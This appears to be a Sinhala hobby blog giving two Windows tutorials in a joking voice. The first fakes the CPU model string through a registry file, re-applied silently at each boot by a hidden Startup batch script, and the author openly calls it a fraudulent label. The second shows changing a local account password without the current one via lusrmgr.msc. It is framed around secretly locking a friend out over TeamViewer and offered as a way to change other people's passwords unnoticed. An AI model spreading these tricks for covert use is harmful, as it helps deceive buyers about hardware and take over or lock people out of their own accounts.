තියනවා... ඒකට socket එක කියලනෙ කියන්නෙ... ඉතිං මේ sockets එක එක මාදිළි තියනවා.. හරියට ඒ ඒ මූඩියට ඒ ඒ බෝතලය වගේ.... PGA Socket 423 කියයි..PGA Socket 441 කියයි.. PGA Socket 478 කියයි..  LGA 775 කියයි...  LGA 1155 කියයි...  LGA 1366 කියයි...  LGA 1567 කියයි... ඉතිං ඔය ඔය වගේ sockets වලට ඒ ඒ වගේ socket type processors තමයි ඈ... තවත් නීති රෙගුලාසි තියනවා...
හලි දන්න එවුන් දැනගනිත්වා... නොදන්න එවුන් ඒත් දැනගනිත්වා මේං කියනවා ජිලාගෙ මේ සූත්තරේ...
ආ.. ඊට කලින් ඔය එක එක තැන තිබුණ පෝස්ටු වල කෙරුවාව කරපු එවුන් ඉන්නවානම් උන් දන්නවා ඒ කෙරුවාව කම්පියුටර් එක restart කලායින් පස්සෙ යථාතත්වයටම පත්වෙනව කියල.. ඒ කියන්නෙ කලේ බොරුවක්නේ..
කලොත් කලේ කම්පියුටර් එක restart කලවිට ඇත්ත උප්පැන්නෙ පෙන්වන පෝස්ටුනේ... මෙතරම් කාලයක් කොහේවත් නිවැරදිව හරිහැටි සූත්තරේ නොලැබුණ... නොකී සූත්තරේ .. ඕං එහෙනම් හැමදාමත් වගේ අලුත් වෙනසක් කරන නොවරදින කෙරුවාවන් උඹට කියලදෙන ජිලාගෙන්ම ඒ කෙරුවාවත් දැනගනිල්ලා ඈ..
…ජිලාගෙන් බොරුවට නෑ ඉඩ... 
මේක ඇස්බැන්දුමක්ම විතරයි ඈ... උඹේ දැනට තියන processor එක මොකක් උනත් අලුතෙන්ම මේ පච්චයක් ගහනව වගේ කොටන්න හදන ලේබලේ විතරයි.. නමට... නම වෙනස් කොලා කියල ඒ නමට එන්න තියන හැම performances එකක් එකක් ගානෙම.. හැම feature එකක් එකක් ගානෙම වෙනසක් සිද්ද වෙන්නෙ නෑ කියල මම ඕං උඹලට මුලින්ම කියනවා ඈ... ඇත්තටම වෙන්නෙ ඇත්ත උප්පැන්නෙ උඩින් හොර..බොරු වංචා උප්පැන්නයක් හදන එක..
…මේං එහෙනම්... ඇස්බැන්දුමත් හැබෑවක් කරන ජිල්මාට්ස් සූත්තරේ...
හලි... මුලින්ම ඕං Start >> All Programs >> Accessories >> Notepad ඈ... දැන් Notepad එක දිගහැරගන්නවා...
…Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0]
"ProcessorNameString"="Intel Core i5-4300M CPU 3.03GHz"
විදියට කෙටුවා... Processor.reg කියල save කොලා...
හලි... දැං ඉතිං තව පුංචිම පුංචි කෙටිල්ලක් තියනවා ඈ... හලි.. දැන් ආයෙමත් Notepad එකක් open කරගන්නකෝ.. ආ... ඊට කලින් අර Processor.reg කියන එක තියන path එක ගන්න ඕනි ඈ... ඒක සරලයි මෙහෙම කරනවනම්... ඒක right click >> properties >> Secuirity දැක්කනේද path එක ආං ඒකෙ කොපියක් අරගෙන මේ අලුත දිගහැරපු notepad එකේ තියන්නයි ඕනි ඈ... මේං මෙහෙම
 regedit /S "C:\Users\Rannulu\Desktop\Processor.reg"
 මේං දැක්කද මේ regedit /S කියන විධානෙන් පසුව "" "" ඇතුළෙයි ඔයාගෙ මේ path එක යෙදෙන්නෙ ඈ.. තේරුණාද මන්දා...
…හලි.. දැන් ඕං ඕකත් save කරගන්නවා jilmarts.bat කියල
…හලි දැන් මේං මෙහෙමයි ඈ... Start >> All Programs >> Startup මේං මෙතන Startup එක උඩ right click කොරලා Explorer All Users ඈ... හලි දැන් ඔය දිගහැරෙන එකේ ඕං ඔය jilmarts.bat එක cut and paste ඈ... ඉන්පස්සෙ ආං අර කලින් හදාගත්තු Processor.reg එක උඩ right click >> Properties >> Hidden >> Apply and OK.
දැන් ඕං ඔය ක්‍රොමෙන් අමතක නොවන shutdown කලත් නොමැකෙන processor එකේ නම වෙනස්කිරිල්ලේ සූත්තරේ..  අත්දුටුවයි ප්‍රත්‍යක්ෂයි... 
ඕං එහෙනම් කොහෙදෝ තිබුණ කුණුහරුප පට්ටපල් බොරු පෝස්ටු නිසා වෙබ් අඩවි ඉතිහාසයේ  මුල්ම වතාවට ජිලාගෙ ජිල්මාට්ස් පෝස්ටුවෙන් Processor එකට හොර උප්පැන්නයක් දීමේ රහස හෙළිදරව් කොලා......
…අද ජිලාගෙ උපන්දිනේ දවසෙ උඹල හැමෝටම තෑග්ගක් ජිලා  දුන්නා කියල හිතාගනිල්ල ඈ...

Thursday, September 19, 2013

කම්පියුටරය ON එකේ තියාගෙනම දැනට ඇති මුරපදය නැතිව අලුත් මුරපදයක් දැමිල්ල (කම්පියුටර් ජිල්මාට්ස් පාට්නම්බර් 47)

පට්...පට්... දැන් වේලාව පෙරවරු 08.55යි. පට්..පට්..ගාල ලීසිං ගන්න සීඩීබී ලීසිං එන්න..  මේ දැන් ලැබුණ විශේෂ ප්‍රවෘත්තියක්.. කම්පියුටර් ජිල්මාට්ස් අත් අඩංගුවට ගන්නැයි අධිකරණ නියෝග. අන්තර්ජාලයේ විප්ලවීය වෙනස යන නාමයෙන් පෙනීසිටිමින් පරිගණක ආශ්‍රිත විවිධ ජිල්මාට්ස් වැඩ අන්තර්ජලයේ මොහුගේම www.jilmarts.blogspot.com යන නාමයෙන් වෙබ් අඩවියක් හරහා කම්පියුටර් ජිල්මාට්ස් වැඩත්.. මොහුගේ රාජකාරීමය වැඩවලට අමතරව සවස් කාලයේ මෙවැනි කටයුතු සදහා පංති පැවැත්වීමට රජයේ අවසරය ගත්තද බ්ලොගිය සදහා අවසර නොගෙන  ඒ ආධාරයෙන්  කියාදෙමින් ශ්‍රී ලාංකිකයින් පරිගණක ජිල්මාට්ස් වැඩ සම්බන්ධයෙන් දක්ෂයන් කිරීමේ උත්සාහයක් ගත් බැවින් ජිල්මාට්ස් නොහොත් ජිලා අත් අඩංගුවට ගන්නයැයි.. ශ්‍රේෂ්ඨාධිකරණය විසින් නියෝගකරල ලදි. මේ වනවිටත් ජිල්මාට්ස් නොහොත් ජිලා තවත් කොම්පියුටර් ජිල්මාට් වැඩක් හෙළිදරව් කිරීමට සූදානම් වන බැව් විශේෂ ආරංචිමාර්ග වලින් හෙළිදරව් වී ඇත.
මලා..... ඔක්කොම ඉවරයි... ඔක්කෝම ඉවරයි... ගහගෙන හිටපු ප්ලෑන්ස්... දැකපු සිහින... ජිලාගෙ ආදරේ... වෙඩිං එක... හනිමූන් එක... ඔක්කෝම ඉවරයි.. අනේ මාව බේරගනින් දෙයියෝ... භාෂී......... භාෂී.......... අනේ මාව බේරගන්නකෝ...මගෙ වස්තුවේ........
…භාෂී........ කවුදෝ ජිලාගේ ඔලුව අතගානවා වගේ දැනුනා... ඒත් එක්කම හයියෙන් හිනාවකුත්... අනේ අනේ... අයියේ... ජිලා තවමත් නිදියහනේ...........
…හත්වලාමයි.. මෙච්චර වෙලාවක් නිව්ස් එක ඇහුණෙ හීනයකින්ද..? මටම නෝන්ඩියි වැඩේට... දැකල තියෙන්නෙ හීනයක් නොවැ.. හීනයක් උනත් මේක කවදාහෝ ඇත්තක් වේවි දැයි යටිහිතේ තිබුණ භය මතුපිටට පැමිණ ඇතැයි වෙලාවකට සිතේ.. 
මොක උනත් ජිලා කරන්නෙ ජිලාගෙ තියන කම්පියුටර් ජිල්මාට්ස් දැනුම එළියට ඇදල තවත් එකෙකුට කියල දෙන එක.. මුදල් අයකිරිල්ලකින් වෙනම පංතියක් පවත්වන එක වෙනම කතාවක්.. මේවට කියන්නෙ educatinal purpose ද purchase ද කියන එකනම් දන්නෙ නෑ... මොක උනත්... ජිලා කරන්නෙ යහපත් සිතෙන්... වදුරාට දැළිපිහිය හමුවෙන එක වෙනම කතාවක්... දැළිපිහිය ගත් වදුරන් බෝකරන්න නෙවෙයි ජිලාගෙ උත්සාහය ඈ...
හලි හලි කතා ඇති... ජිලාගෙ රහසක් වෙච්චි දෙයක් අද එළියට දාන්නයි යන්නෙ ඈ... රහසක් කිව්වම ප්‍රයිවෙට් එව්ව නෙවෙයි ඈ... ජිල්මාට්ස් ජිල්මාට්ස්...
…ඕං එක දවසක් උදෑහනින් සෙනසුරාදා දවසක ඈ... ජිලාට ෆේස්බුකියේ මිතුරෙකුගේ කම්පියුටරේට team viewer හරහා ලොග් වෙන්න උනාලු ඈ... ඉතිං ඌත් ජිලාගෙ ගජ මිතුරෙක් නිසා පුංචිපහේ ආතල් එකක් ගන්න ජිලාට හිත්දුන්නලු ඈ... ඉතිං ජිලා team viewer එකෙන් කැපෙද්දී මෙහෙම දෙයක් කිව්වලු පොරට.. මචෝ... උඹේ කම්පියුටරයට ජිලාව මතක්වෙන්නද jilmarts කියල මුරපද දාගෙන ඉන්නෙ කියලා. ඈ.. පොර කිව්වලු මට පිස්සුද උඹව මතක්කොරගන්න කියලා.. ඈ... …දැන් ඉතිං ජිලා ඌට බායි කියලා ගියාලු ඈ...
…මෙන්න බොලේ ටික වෙලාවකින් අර පොර ජිලාගෙ මොබයිල් එකට එක දිගට කෝල් ගන්නවලු ඈ... ඕං ජිලා ඒකට උත්තර බදිනවා..
…ඔව් මචං කියපං... මොකක්ද මගෙන් වෙන්න ඕනි..?
…මොළේ කොළොප්පන් වෙලා ඕයි ඉන්නෙ... තෝ මොකක්ද මගේ මේ කම්පියුටරේට කොලේ..?
…ඇයි බං..? මගෙත් මොළේ කොළොප්පන් නොකර කියපන් බලන්න මොකක්ද වෙලා තියෙන්නෙ කියලා..
…යකෝ මගේ පාස්වර්ඩ් එක වැඩ නෑ...
…මළා........
…තෝ මොකක්ද කලේ..?
…මම මොනවත් කලේ නෑ බං.. උඹ ජිලාව මතක්කරගෙන ගහපන්... අතේ නෙවෙයි ඈ... jilmarts කියල පාස්වර්ඩ් එකට ගහල බලපන්...
…හා පොඩ්ඩක් හිටු... යකෝ මේක ජිලාගෙම වැඩක් නොවැ.. jilmarts ම තමා පාස්වර්ඩ් එක.. තෝ කොහොමද ඒක වෙනස් කලේ..? අනික බං තියන පාස්වර්ඩ් එක වෙනස් කරද්දි current password ද මොකක්ද ඉල්ලනව නේද..? තෝ මගේ එක දන්නෙ කොහොමද මේ ඩිංගට... තෝ කොහොමද ඒක වෙනස් කලේ..?
…හික්ස්...... මට කැස්සකුත් ආව ඕයි... පල්ලෙහායිනුත් කැස්සක් එනවද මන්දා...
…දැන් වැඩේ ගොඩනේ... පාස්වර්ඩ් එකත් jilmarts නේ.. මාව මතක්වෙන්න ඕකම තියාගනින් එහෙනම් ඈ... මම තියන්නද බං.. පොඩි වැඩකුත් තියනවා කරන්න... එහෙනම් පරිස්සමින් හිටපන් ඈ... බුදුසරණයි... සියලු දෙවි රැකවරණයි..
…වදුරාට දැළිපිහිය දීලා වදුරෝ දැන් කපපන් අහවල් එක නොකියා ජිලා හිරගෙට  යන්න කලින් මේ ජිලාගෙ අනුන්ට නොදැනිම මුරපද වෙනස් කිරිල්ලේ සූත්තරෙයි කියලදෙන්න යන්නෙ ඈ...
මීට කලින් ජිලාගෙ පෝස්ටු කිහිපයක්ම බ්ලොග් පෝස්ටු සොරුන් විසින් සොරාගෙන ඇති නිසා ඕං ජිලා කියනවා මුල්ම වතාවට අනික් පෝස්ටු වගේම මේ සූත්තරෙත් මුලින්ම උඹලට කියලදෙන්නෙ ජිලාම තමයි කියල ඈ...
සාමාන්‍යයෙන් පරිගණකයක් ක්‍රියාත්මක මට්ටමේ පවතිද්දී යොදාඇති මුරපදය වෙනස් කරන්න නිසැකවම කලින් යොදාඇති මුරපදය current password කියල ඉල්ලන තැනට ලබාදියයුතුවෙනවා... එහෙම නැතිව මුරපදය වෙනස් කිරීම මුල්ම වතාවට උඹ ඉදිරියේ තැබීම සම්බන්ධව ගෞරවය ජිල්මාට්ස්ට තමා ඈ.. මෙව්ව මේ කියලදෙන්නෙ කැහිල්ලකටවත්... උඹල ඉදිරියේ අමුතුවෙන් පොරක්වෙන්නවත් නෙවෙයි ඈ... මම කොහොමත් පොරක්... අවුරුදු 24ක සයිලන්ට් කොල්ලෙක්.. අහිංසක එකෙක්.. අහිංසකයි කිව්වට ඉතිං...  නයා දරමිටියකට ලණුවක් වෙන්න තරම් අහිංසකයෙක් නෙවේ..
…හලි..හලි... current password නැතිව අනුන්ගේ කම්පියුටරයේ මුරපදය වෙනස් කරන්නයි මේ ලකලෑස්තිය ඈ...
…හලි හලි.. කතා ඇති.. මේං එහෙනම් සූත්තරේ... windows key + R එහෙමත් නැතිනම් , Start >> All Programs >> Accessories >> Run ඈ...
…හලි... දැන් ඉතිං ඔය ඔතැන lusrmgr.msc කියල ටයිප් කරල එන්ටර්  කරමුකෝ...
…Local Users and Groups දිගහැරෙයි ඈ... ඕං ඔතන ඔය Users කියන එක ක්ලික් කොලානම් බලමු... පේනවද දැනට භාවිතවන users ල ලස්සනට පෙන්වන අපූරුව.. හරි... ඔන්න දැන් තමයි වැඩේ ඈ... ඔය user කෙනෙක් උඩින් right click කරන්නකෝ... දැක්කද Set Password කියල එකක්... මෙන්න ජිලාගෙ ඇස් ගැහෙනවා... කෙල්ලෙක්වත් නෑ... අනේමන්දා.. උඹට තේරුණාද මන්දා... Set Password for Jilmarts ලු... You are logged in as "Jilmarts". You have chosen to reset the password for your local user account එක්ක තවත් දිග හෑල්ලක්... හලි හලි... දැන් Proceed ඈ...
…මෙන්න බොලේ වැඩක් කෝ... current password ඉල්ලන තැනක් නැහැනෙ.. කෙලින්ම තියෙන්නෙ New Password එකයි ඒක නිවැරදිව ආයෙමත් ටයිප් කරන්න තියෙන Confirm Password කියන එකයි විතරයිනෙ..
…දැන් ඉතිං jilmarts කියල ඔය තැන් දෙකටම දෙනව ඈ... දැන් OK දෙනවා ඈ...
The Password has been set ලු... අපිට මොකෝ... දැන් මුරපදය jilmarts තිබුණ එකෙන් ලොග්විලි බොරු ඈ... ලොග් වෙන්න නම් ඉතිං දැන් jilmarts ම තමා ඈ..
දැන් ඉතිං යහළුවෙකුටවත් උඹේ කම්පියුටරයට භය නැතිව දෙන්නත් ජිලා නැතිකලා කියල පෙත්සම් ගහල උසාවි නියෝග අරන් ජිලාව හිරේට දාපල්ලා... ඊටකලින් මතකතියාගනින්  මුරපද අනුන්ට හොරා වෙනස්කරන්න වගේම දාපු මුරපද කඩන්නත් ජිලා මීට ඉහත පෝස්ටු බරගණනකදීම කියල දීල තියන නිසා භයවෙන්න  දෙයක් නෑ..ඈ...
…මේ ඇත්තටම ජිලාට හිරගෙට යන්න උනොත් උඹල බැරිද බං ජිලා වෙනුවෙන් ඒ හිරගෙදර ගොහින් බත්පතේ රසබලන්න... වැඩරාජකාරි පැණෙවෙනවනම් ඒවත් කරන්න බැරියැ... වැඩිම උනොත් කොල නැතිගහ දැනට ක්‍රියාත්මක නොවන නිසා ආතල් එකේ ඇතුළෙ හිටියහැකි.. ජිලාට බැරියැ ඇවිදින් උඹේ සැපදුක බලල යන්න... ලෙඩක් දුකක්.. හැදුණොත් ඔපරේෂන් කරන්න දන්න වෙන්න හාමිනේ කෙනෙකුත් ජිලා ළග ඉන්නවනේ.. උඹ කැමතියි නේද..?